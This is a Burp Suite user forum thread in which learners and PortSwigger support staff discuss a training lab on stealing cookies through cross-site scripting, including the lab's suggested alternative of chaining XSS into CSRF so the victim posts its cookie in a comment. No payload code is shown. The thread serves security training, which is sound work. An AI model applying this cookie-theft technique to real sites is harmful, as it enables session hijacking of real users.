Burp Suite User Forum

Login to post

Exploiting cross-site scripting to steal cookies

Olivier | Last updated: Oct 15, 2019 03:38PM UTC

I inject javascript code to steal cookies but the online lab doesn't simulate another user who views blog comments after they are posted ... any idea why ? Known bug ? I don't use Burp Collaborator but a service hosted on Heroku. Thanks for any help

Ben, PortSwigger Agent | Last updated: Oct 16, 2019 07:49AM UTC

Hi Olivier, Thank you for your message. The labs are designed to be solved using the tools within Burp Suite. I have just tested the lab and was able to successfully complete it using the Burp Collaborator. I would suggest using the Burp Collaborator and see if you have any further issues completing the lab.

Ben, PortSwigger Agent | Last updated: Oct 16, 2019 11:52AM UTC

Hi Olivier, Unfortunately, Burp Collaborator is only available in the Professional edition. Having looked at the lab again, it does state: "Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed." So perhaps you could investigate and use this method instead of Burp Collaborator if you are looking to solve the lab. Please let us know if you need any further assistance.

Burp User | Last updated: Oct 16, 2019 03:11PM UTC

Hi Ben, Thanks for your answer. Is Burp Collaborator included in Burp Community version ? Regards Olivier

Gadotti | Last updated: Feb 18, 2020 10:59PM UTC

The problem is that the note says: "Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed. " I did exactly what was is said, I exposed the document cookie from 'another' user in the comments, injecting a JS but I didn't get a solved tag. It' not to be a Collaborator alternative?

Uthman, PortSwigger Agent | Last updated: Feb 19, 2020 09:14AM UTC

Hi Gadotti, Can you send a screen recording of exactly what you are doing to support@portswigger.net?

You need to Log in to post a reply. Or register here, for free.